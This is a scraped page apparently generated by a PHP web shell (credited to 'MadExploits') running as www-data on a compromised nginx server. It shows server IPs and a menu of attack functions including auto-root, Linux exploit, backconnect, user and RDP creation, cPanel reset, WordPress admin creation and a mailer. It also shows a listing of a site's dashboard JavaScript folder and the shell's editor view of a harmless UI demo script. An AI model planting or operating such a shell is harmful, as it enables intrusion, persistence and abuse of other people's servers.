Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sifaris /
public /
_dashboard /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
ace.js
238
B
-rw-rw-r--
alerts.js
2.4
KB
-rw-rw-r--
avgrund.js
914
B
-rw-rw-r--
bootstrap-table.js
1.69
KB
-rw-rw-r--
bt-maxlength.js
802
B
-rw-rw-r--
c3.js
5.63
KB
-rw-rw-r--
calendar.js
2.64
KB
-rw-rw-r--
chart.js
12.02
KB
-rw-rw-r--
chartist.js
4.72
KB
-rw-rw-r--
circle-progress.js
310
B
-rw-rw-r--
clipboard.js
225
B
-rw-rw-r--
codeEditor.js
3.59
KB
-rw-rw-r--
codemirror.js
1.53
KB
-rw-rw-r--
context-menu.js
4.96
KB
-rw-rw-r--
cropper.js
105
B
-rw-rw-r--
custom.js
1.13
KB
-rw-rw-r--
dashboard.js
23.43
KB
-rw-rw-r--
data-table.js
821
B
-rw-rw-r--
db.js
21.3
KB
-rw-rw-r--
desktop-notification.js
1.83
KB
-rw-rw-r--
dragula.js
789
B
-rw-rw-r--
dropify.js
69
B
-rw-rw-r--
dropzone.js
127
B
-rw-rw-r--
editorDemo.js
6.31
KB
-rw-rw-r--
file-upload.js
398
B
-rw-rw-r--
flot-chart.js
10.82
KB
-rw-rw-r--
form-addons.js
4.36
KB
-rw-rw-r--
form-repeater.js
1.39
KB
-rw-rw-r--
form-validation.js
4.21
KB
-rw-rw-r--
formpickers.js
1.58
KB
-rw-rw-r--
google-charts.js
4.98
KB
-rw-rw-r--
google-maps.js
13.63
KB
-rw-rw-r--
horizontal-menu.js
426
B
-rw-rw-r--
hoverable-collapse.js
1.29
KB
-rw-rw-r--
iCheck.js
1.22
KB
-rw-rw-r--
inputmask.js
99
B
-rw-rw-r--
ion-range-slider.js
3.19
KB
-rw-rw-r--
jq.tablesort.js
3.13
KB
-rw-rw-r--
jquery-3.2.1.min.js
84.63
KB
-rw-rw-r--
jquery-file-upload.js
185
B
-rw-rw-r--
js-grid.js
4.78
KB
-rw-rw-r--
js-tree.js
2.04
KB
-rw-rw-r--
justgage.js
3.43
KB
-rw-rw-r--
kanban.js
236
B
-rw-rw-r--
light-gallery.js
397
B
-rw-rw-r--
listify.js
158
B
-rw-rw-r--
login.js
2.6
KB
-rw-rw-r--
mapeal.js
5.56
KB
-rw-rw-r--
mapeal_example_2.js
291.44
KB
-rw-rw-r--
mapeal_example_3.js
3.47
KB
-rw-rw-r--
mapiel.js
295.73
KB
-rw-rw-r--
maps.js
4.63
KB
-rw-rw-r--
misc.js
8.66
KB
-rw-rw-r--
modal-demo.js
636
B
-rw-rw-r--
morris.js
2.83
KB
-rw-rw-r--
no-ui-slider.js
6.83
KB
-rw-rw-r--
off-canvas.js
185
B
-rw-rw-r--
owl-carousel.js
2.58
KB
-rw-rw-r--
paginate.js
491
B
-rw-rw-r--
popover.js
807
B
-rw-rw-r--
profile-demo.js
168
B
-rw-rw-r--
progress-bar.js
5.79
KB
-rw-rw-r--
select2.js
237
B
-rw-rw-r--
settings.js
3.42
KB
-rw-rw-r--
sparkline.js
1.87
KB
-rw-rw-r--
st-wizard.js
1.66
KB
-rw-rw-r--
sweetalert2.js
55.17
KB
-rw-rw-r--
tablesorter.js
243
B
-rw-rw-r--
tabs.js
974
B
-rw-rw-r--
tight-grid.js
176
B
-rw-rw-r--
toastDemo.js
2.42
KB
-rw-rw-r--
todo.js
442
B
-rw-rw-r--
todolist.js
1.23
KB
-rw-rw-r--
tooltips.js
810
B
-rw-rw-r--
typeahead.js
1.88
KB
-rw-rw-r--
widgets.js
29.07
KB
-rw-rw-r--
wizard.js
1.34
KB
-rw-rw-r--
x-editable.js
4.92
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : editorDemo.js
(function($) { 'use strict'; /*Quill editor*/ if ($("#quillExample1").length) { var quill = new Quill('#quillExample1', { modules: { toolbar: [ [{ header: [1, 2, false] }], ['bold', 'italic', 'underline'], ['image', 'code-block'] ] }, placeholder: 'Compose an epic...', theme: 'snow' // or 'bubble' }); } /*simplemde editor*/ if ($("#simpleMde").length) { var simplemde = new SimpleMDE({ element: $("#simpleMde")[0] }); } /*Tinymce editor*/ if ($("#tinyMceExample").length) { tinymce.init({ selector: '#tinyMceExample', height: 500, theme: 'silver', plugins: [ 'advlist autolink lists link image charmap print preview hr anchor pagebreak', 'searchreplace wordcount visualblocks visualchars code fullscreen', 'insertdatetime media nonbreaking save table contextmenu directionality', 'emoticons template paste textcolor colorpicker textpattern imagetools codesample toc help' ], toolbar1: 'undo redo | insert | styleselect | bold italic | alignleft aligncenter alignright alignjustify | bullist numlist outdent indent | link image', toolbar2: 'print preview media | forecolor backcolor emoticons | codesample help', image_advtab: true, templates: [{ title: 'Test template 1', content: 'Test 1' }, { title: 'Test template 2', content: 'Test 2' } ], content_css: [] }); } /*Summernote editor*/ if ($("#summernoteEditor").length) { $('#summernoteEditor').summernote({ height: 300, tabsize: 2 }); } /*X-editable editor*/ if ($('#editable-form').length) { $.fn.editable.defaults.mode = 'inline'; $.fn.editableform.buttons = '<button type="submit" class="btn btn-primary btn-sm editable-submit">' + '<i class="fa fa-fw fa-check"></i>' + '</button>' + '<button type="button" class="btn btn-default btn-sm editable-cancel">' + '<i class="fa fa-fw fa-times"></i>' + '</button>'; $('#username').editable({ type: 'text', pk: 1, name: 'username', title: 'Enter username' }); $('#firstname').editable({ validate: function(value) { if ($.trim(value) === '') return 'This field is required'; } }); $('#sex').editable({ source: [{ value: 1, text: 'Male' }, { value: 2, text: 'Female' } ] }); $('#status').editable(); $('#group').editable({ showbuttons: false }); $('#vacation').editable({ datepicker: { todayBtn: 'linked' } }); $('#dob').editable(); $('#event').editable({ placement: 'right', combodate: { firstItem: 'name' } }); $('#meeting_start').editable({ format: 'yyyy-mm-dd hh:ii', viewformat: 'dd/mm/yyyy hh:ii', validate: function(v) { if (v && v.getDate() === 10) return 'Day cant be 10!'; }, datetimepicker: { todayBtn: 'linked', weekStart: 1 } }); $('#comments').editable({ showbuttons: 'bottom' }); $('#note').editable(); $('#pencil').on("click", function(e) { e.stopPropagation(); e.preventDefault(); $('#note').editable('toggle'); }); $('#state').editable({ source: ["Alabama", "Alaska", "Arizona", "Arkansas", "California", "Colorado", "Connecticut", "Delaware", "Florida", "Georgia", "Hawaii", "Idaho", "Illinois", "Indiana", "Iowa", "Kansas", "Kentucky", "Louisiana", "Maine", "Maryland", "Massachusetts", "Michigan", "Minnesota", "Mississippi", "Missouri", "Montana", "Nebraska", "Nevada", "New Hampshire", "New Jersey", "New Mexico", "New York", "North Dakota", "North Carolina", "Ohio", "Oklahoma", "Oregon", "Pennsylvania", "Rhode Island", "South Carolina", "South Dakota", "Tennessee", "Texas", "Utah", "Vermont", "Virginia", "Washington", "West Virginia", "Wisconsin", "Wyoming"] }); $('#state2').editable({ value: 'California', typeahead: { name: 'state', local: ["Alabama", "Alaska", "Arizona", "Arkansas", "California", "Colorado", "Connecticut", "Delaware", "Florida", "Georgia", "Hawaii", "Idaho", "Illinois", "Indiana", "Iowa", "Kansas", "Kentucky", "Louisiana", "Maine", "Maryland", "Massachusetts", "Michigan", "Minnesota", "Mississippi", "Missouri", "Montana", "Nebraska", "Nevada", "New Hampshire", "New Jersey", "New Mexico", "New York", "North Dakota", "North Carolina", "Ohio", "Oklahoma", "Oregon", "Pennsylvania", "Rhode Island", "South Carolina", "South Dakota", "Tennessee", "Texas", "Utah", "Vermont", "Virginia", "Washington", "West Virginia", "Wisconsin", "Wyoming"] } }); $('#fruits').editable({ pk: 1, limit: 3, source: [{ value: 1, text: 'banana' }, { value: 2, text: 'peach' }, { value: 3, text: 'apple' }, { value: 4, text: 'watermelon' }, { value: 5, text: 'orange' } ] }); $('#tags').editable({ inputclass: 'input-large', select2: { tags: ['html', 'javascript', 'css', 'ajax'], tokenSeparators: [",", " "] } }); $('#address').editable({ url: '/post', value: { city: "Moscow", street: "Lenina", building: "12" }, validate: function(value) { if (value.city === '') return 'city is required!'; }, display: function(value) { if (!value) { $(this).empty(); return; } var html = '<b>' + $('<div>').text(value.city).html() + '</b>, ' + $('<div>').text(value.street).html() + ' st., bld. ' + $('<div>').text(value.building).html(); $(this).html(html); } }); $('#user .editable').on('hidden', function(e, reason) { if (reason === 'save' || reason === 'nochange') { var $next = $(this).closest('tr').next().find('.editable'); if ($('#autoopen').is(':checked')) { setTimeout(function() { $next.editable('show'); }, 300); } else { $next.focus(); } } }); } })(jQuery);
Close